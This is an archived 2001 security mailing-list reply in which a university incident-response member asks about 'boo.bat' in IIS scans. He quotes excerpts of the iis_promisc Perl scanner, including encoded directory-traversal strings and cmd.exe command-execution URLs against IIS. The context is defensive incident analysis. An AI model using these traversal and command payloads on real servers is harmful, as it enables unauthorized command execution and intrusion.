Re: iis scanning

From: Jordan K Wiens (jwiensat_private)
Date: Mon Jul 02 2001 - 12:24:15 PDT

Next message: gabriel rosenkoetter: "Re: Why would someone DoS a free-lance writer?"

Previous message: Jordan K Wiens: "iis scanning"
In reply to: Jordan K Wiens: "iis scanning"
Next in thread: Patrick Oonk: "Re: iis scanning"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Since the security focus page doesn't actually list the source, I'll quote
the relevant parts below.

For those of you who are curious (I was) someone found me the translation
of MinhaNossaSenhoraDoPerpetuoSocorro.  It means Our Lady of Perpetual
Help, referring to Mary.  Interesting invocation to hack under.

-- 
Jordan Wiens
UF Network Incident Response Team
(352)392-2061

On Mon, 2 Jul 2001, Jordan K Wiens wrote:

> Anyone seen an iis scan that attempts to access boo.bat among other
> requests along with directory traversal attempts?  I found the source of
> the script on the web but no mention is made of what boo.bat is included
> for.  Anyone know what this is?
> 
> http://www.securityfocus.com/tools/2060
> 
> 




-----------IIS_PROMISC EXCERPTS----------------
#!/usr/bin/perl
#
# iis_promisc v2.0
#
# This is a perl script to test the infamous
# Microsoft IIS holes:
#
# -*- Escaped Characters Decoding Bug
# -*- Unicode Directory Transversal Bug
#
# * Support Proxy Server
# * Over 20 tests will be made ( if found display the patch URL too :)
#
# Added to v2:
#
# -*- Executable File Parsing Bug check
# -*- Over 40 bugs tested! 
#
# * REQUIRE LWP(Lib WWW for Perl) http://www.linpro.no/lwp/ 
#   The package libwww is found in many linux distributions
#
# by inodeat_private
# greetz to #unsekure @ irc.brasnet.org
# http://unsekure.com.br
#
# 05/2001

.
. [SNIP]
.

$test_command = "winnt/system32/cmd.exe?/c+echo+MinhaNossaSenhoraDoPerpetuoSocorro";
$dir_command = "winnt/system32/cmd.exe?/c+dir";
$iis = "1";

my @dir=(

# You can add more exec dirs here
#"/somedir/",

"/", ## wwwroot
"/scripts/",
"/msadc/",
"/cgi-bin/",
"/bin/",
"/samples/",
"/_vti_cnf/",
"/_vti_bin/",
"/adsamples/",
"/iisadmpwd/",
"/Rpc/",
"/PBServer/");

my @string=(

"..%255c..%255c..%255c..%255c..%255c..%255c",
"..%c0%af../..%c0%af../..%c0%af../",
"..%e0%80%af../..%e0%80%af../..%e0%80%af../",
"boo.bat/..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C");

.
. [SNIP]
.

And the rest is pretty straight forward.  Nothing too tricky.





----------------------------------------------------------------------------


This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see:

http://aris.securityfocus.com

Next message: gabriel rosenkoetter: "Re: Why would someone DoS a free-lance writer?"
Previous message: Jordan K Wiens: "iis scanning"
In reply to: Jordan K Wiens: "iis scanning"
Next in thread: Patrick Oonk: "Re: iis scanning"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Jul 02 2001 - 21:43:29 PDT